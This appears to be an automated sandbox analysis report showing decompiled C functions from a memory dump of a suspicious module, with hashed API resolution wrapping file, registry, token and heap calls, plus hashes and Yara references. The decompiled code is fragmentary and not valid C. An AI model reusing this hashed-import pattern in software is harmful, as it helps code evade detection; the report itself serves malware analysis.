Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction ID: d3e5aa5f07f091c04fde8e11b9d64143a404288569aadd423d5a47f39a09180f
Opcode Fuzzy Hash: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction Fuzzy Hash: 9411CA706142835FFF76D5E898B0BAF76589F42744F104C65EC70DA8E4CA24CC89C666

Uniqueness

Uniqueness Score: -1.00%

Function 6E875BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E875BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E873064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E86C26C(_t24);
				if(E6E86C280(_t24) != 0) {
					_t34[2] = E6E8735F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E873064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E873698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E873064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e875bbd
0x6e875bc1
0x6e875bc4
0x6e875bc7
0x6e875c09
0x6e875c12
0x6e875c18
0x6e875c19
0x6e875c0b
0x6e875c0d
0x6e875c0d
0x6e875c2f
0x6e875c43
0x6e875c31
0x6e875c3e
0x6e875c40
0x6e875c40
0x6e875c45
0x6e875c4a
0x6e875c58
0x6e875cc3
0x6e875cc6
0x6e875c5a
0x6e875c5f
0x6e875cac
0x6e875cb0
0x6e875cba
0x6e875cba
0x6e875cb0
0x6e875c61
0x6e875c6d
0x6e875c72
0x6e875c86
0x6e875c88
0x6e875c89
0x6e875c8a
0x6e875c8c
0x6e875c8e
0x6e875c8f
0x6e875c8f
0x6e875c92
0x6e875c92
0x6e875c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E875C3E

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: 8a4575bfbed766b5ef67c5bf9a238979ca8b94efd107d9f8732787d0c88b970b
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: 6E01CC7128430ABBFFA067E94D45F7E778CDBC2698F008C35BA01A91C5EA12A9598121

Uniqueness

Uniqueness Score: -1.00%

Function 6E875BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E875BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E873064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E86C26C(_t24);
					if(E6E86C280(_t24) != 0) {
						_t33[2] = E6E8735F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E873064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E873698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E873064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6e875be5
0x6e875be7
0x6e875bfe
0x6e875c09
0x6e875c12
0x6e875c18
0x6e875c19
0x6e875c0b
0x6e875c0d
0x6e875c0d
0x6e875c2f
0x6e875c43
0x6e875c31
0x6e875c3e
0x6e875c40
0x6e875c40
0x6e875c45
0x6e875c4a
0x6e875c58
0x6e875cc3
0x6e875cc6
0x6e875c5a
0x6e875c5f
0x6e875cac
0x6e875cb0
0x6e875cba
0x6e875cba
0x6e875cb0
0x6e875c61
0x6e875c6d
0x6e875c72
0x6e875c86
0x6e875c88
0x6e875c89
0x6e875c8a
0x6e875c8c
0x6e875c8e
0x6e875c8f
0x6e875c8f
0x6e875c92
0x6e875c92
0x6e875be9
0x6e875be9
0x6e875bf0
0x6e875bf0
0x6e875c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E875C3E

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: ba0b804be2957def72ff29346585f039945a321dff11a543e628bc22a2c81157
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: 4E01007028430ABFFFB067E98C44F6F774CDBC2648F108C35BA01551C5DB22A958C221

Uniqueness

Uniqueness Score: -1.00%

Function 6E875BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E875BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E873064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E86C26C(_t24);
				if(E6E86C280(_t24) != 0) {
					_t34[2] = E6E8735F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E873064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E873698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6E873064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e875bd1
0x6e875bd8
0x6e875bdb
0x6e875c09
0x6e875c12
0x6e875c18
0x6e875c19
0x6e875c0b
0x6e875c0d
0x6e875c0d
0x6e875c2f
0x6e875c43
0x6e875c31
0x6e875c3e
0x6e875c40
0x6e875c40
0x6e875c45
0x6e875c4a
0x6e875c58
0x6e875cc3
0x6e875cc6
0x6e875c5a
0x6e875c5f
0x6e875cac
0x6e875cb0
0x6e875cba
0x6e875cba
0x6e875cb0
0x6e875c61
0x6e875c6d
0x6e875c72
0x6e875c86
0x6e875c88
0x6e875c89
0x6e875c8a
0x6e875c8c
0x6e875c8e
0x6e875c8f
0x6e875c8f
0x6e875c92
0x6e875c92
0x6e875c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E875C3E

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: 2aa8ef438446bf87d67a86994349982305dd704d94642b9dfde4b1a3d95c902d
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: E901D27528430ABBFF6067E94D44F7F764DDBC2658F004C35BA01951C9DE226958C121

Uniqueness

Uniqueness Score: -1.00%

Function 6E875BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E875BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E873064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E86C26C(_t23);
				if(E6E86C280(_t23) != 0) {
					_t31[2] = E6E8735F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E873064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E873698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E873064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e875bb3
0x6e875bba
0x6e875c09
0x6e875c12
0x6e875c18
0x6e875c19
0x6e875c0b
0x6e875c0d
0x6e875c0d
0x6e875c2f
0x6e875c43
0x6e875c31
0x6e875c3e
0x6e875c40
0x6e875c40
0x6e875c45
0x6e875c4a
0x6e875c58
0x6e875cc3
0x6e875cc6
0x6e875c5a
0x6e875c5f
0x6e875cac
0x6e875cb0
0x6e875cba
0x6e875cba
0x6e875cb0
0x6e875c61
0x6e875c6d
0x6e875c72
0x6e875c86
0x6e875c88
0x6e875c89
0x6e875c8a
0x6e875c8c
0x6e875c8e
0x6e875c8f
0x6e875c8f
0x6e875c92
0x6e875c92
0x6e875c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E875C3E

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: 7e02de883b73a3400a7b41fb587c24709514d8bcfe10698e2c9308383034d3fd
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 6801DF7128430ABBFFB167E98D44FBF774CDBC2658F104C35BA01651C9DE22A958C121

Uniqueness

Uniqueness Score: -1.00%

Function 6E875C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E875C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E873064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E86C26C(_t23);
				if(E6E86C280(_t23) != 0) {
					_t31[2] = E6E8735F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E873064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E873698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E873064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e875c01
0x6e875c05
0x6e875c09
0x6e875c12
0x6e875c18
0x6e875c19
0x6e875c0b
0x6e875c0d
0x6e875c0d
0x6e875c2f
0x6e875c43
0x6e875c31
0x6e875c3e
0x6e875c40
0x6e875c40
0x6e875c45
0x6e875c4a
0x6e875c58
0x6e875cc3
0x6e875cc6
0x6e875c5a
0x6e875c5f
0x6e875cac
0x6e875cb0
0x6e875cba
0x6e875cba
0x6e875cb0
0x6e875c61
0x6e875c6d
0x6e875c72
0x6e875c86
0x6e875c88
0x6e875c89
0x6e875c8a
0x6e875c8c
0x6e875c8e
0x6e875c8f
0x6e875c8f
0x6e875c92
0x6e875c92
0x6e875c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E875C3E

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 44115308191ccacfb77f366c98b81dc810bb78a3d2ae6a352b556aaf861651d6
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: C101DF3528530ABBFFB067E98D44F7F7B4CDBC2698F004C35BA01651C9DE22A958C121

Uniqueness

Uniqueness Score: -1.00%

Function 6E875E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E875E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E86C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E873064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6e875e14
0x6e875e15
0x6e875e17
0x6e875e1d
0x6e875e1f
0x6e875e23
0x6e875e23
0x6e875e27
0x6e875e33
0x6e875e67
0x6e875e67
0x00000000
0x6e875e35
0x6e875e3a
0x6e875e3b
0x6e875e4f
0x6e875e60
0x6e875e51
0x6e875e5c
0x6e875e5c
0x6e875e65
0x6e875e6d
0x6e875e6f
0x6e875e72
0x6e875e77
0x6e875e77
0x6e875e7b
0x6e875e80
0x00000000
0x00000000
0x00000000
0x6e875e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E875D48,?,?), ref: 6E875E5C

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 97d4ebd3c84e08b2ee241d6e3677c3ff7265a1cf8a77ff5f0c79621e46b92633
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: AEF04932A09F11BADF715BBD9C40A8F73E8DFD2BD0F144E39F580A6184E66098808261

Uniqueness

Uniqueness Score: -1.00%

Function 6E875E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E875E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E86C280(_t19) == 0) {
					_v12 = _a8;
					if(E6E873064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E8735F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6e875e87
0x6e875e89
0x6e875e95
0x6e875e9f
0x6e875eb5
0x6e875ed4
0x6e875eb7
0x6e875ec8
0x6e875ecc
0x6e875eec
0x6e875ece
0x6e875ece
0x6e875ece
0x6e875ecc
0x6e875ed5
0x6e875eda
0x6e875ee3
0x6e875edc
0x6e875edc
0x6e875ede
0x6e875ede
0x6e875e97
0x6e875e97
0x6e875e97
0x6e875ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E875D79,00000000,?,00000000,?), ref: 6E875EC8

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: c6c9a3820268d41fcd38036d8bb3584e599b1eb60aec24f3e25174942dc4ed0b
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: 69F0363225CB07EFEF71DBA99C10AAE77D9AF45294F104C29A895C6190EB32D944C722

Uniqueness

Uniqueness Score: -1.00%

Function 6E87564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E87564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E873064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E86E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6e875656
0x6e875658
0x6e87565f
0x6e875661
0x6e875665
0x6e875667
0x6e87566a
0x6e87566d
0x6e87566d
0x6e875687
0x00000000
0x00000000
0x6e875698
0x6e87569c
0x00000000
0x00000000
0x6e8756aa
0x6e8756ad
0x6e8756b2
0x6e8756b7
0x6e8756b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E875698

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: 284e7c45fec5ad15d4d266f647c272e0a2436ca4ffb487673f6aa9e16abc4e23
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 1BF0C8B510430AAFE7749F5ACC54DBBBBFCDBC1B50F00891DA0D542540EA31AC50C971

Uniqueness

Uniqueness Score: -1.00%

Function 6E871030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E871030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E87306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E87306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6e87103e
0x6e871040
0x6e87104e
0x6e871052
0x6e87109b
0x00000000
0x6e87109b
0x6e871057
0x6e871058
0x6e87105a
0x6e87105f
0x00000000
0x6e871078
0x6e87107c
0x6e871089
0x6e87108d
0x00000000
0x00000000
0x00000000
0x6e871096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E871089

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 61223f190ba63d09c899c42bf2b78fa83ac67208ce3d20e4b9d7ad76ca1c8cbf
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: 58F04970244683ABEE60D5BC9C78F7F32AD5BC1614F508C28B580CA594EB78CA498626

Uniqueness

Uniqueness Score: -1.00%

Function 6E873628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6E873628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e87d228 == 0xa33c83e5) {
					_t7 = E6E873064(0x60a28c5c, 0x1c6ef387);
					 *0x6e87d22c = E6E873064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6e87d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e87d228 = 0;
					}
				}
				_t3 = E6E873064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e87d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6e873630
0x6e873638
0x6e87366b
0x6e87367c
0x6e873687
0x6e873692
0x6e873694
0x6e873694
0x6e873687
0x6e873644
0x6e87364b
0x00000000
0x6e87364d
0x6e87364d
0x6e87364e
0x6e873650
0x6e873652
0x6e873653
0x00000000
0x6e873653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E86DE09,?,?), ref: 6E873692

Memory Dump Source

Source File: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, Offset: 6E860000, based on PE: true

Associated: 00000001.00000002.777996746.000000006E860000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778040396.000000006E87A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.778053025.000000006E87D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 07d9c4833f1366b83be5177309f9aa39735453b2e90931b29ff6469b0ea7a879
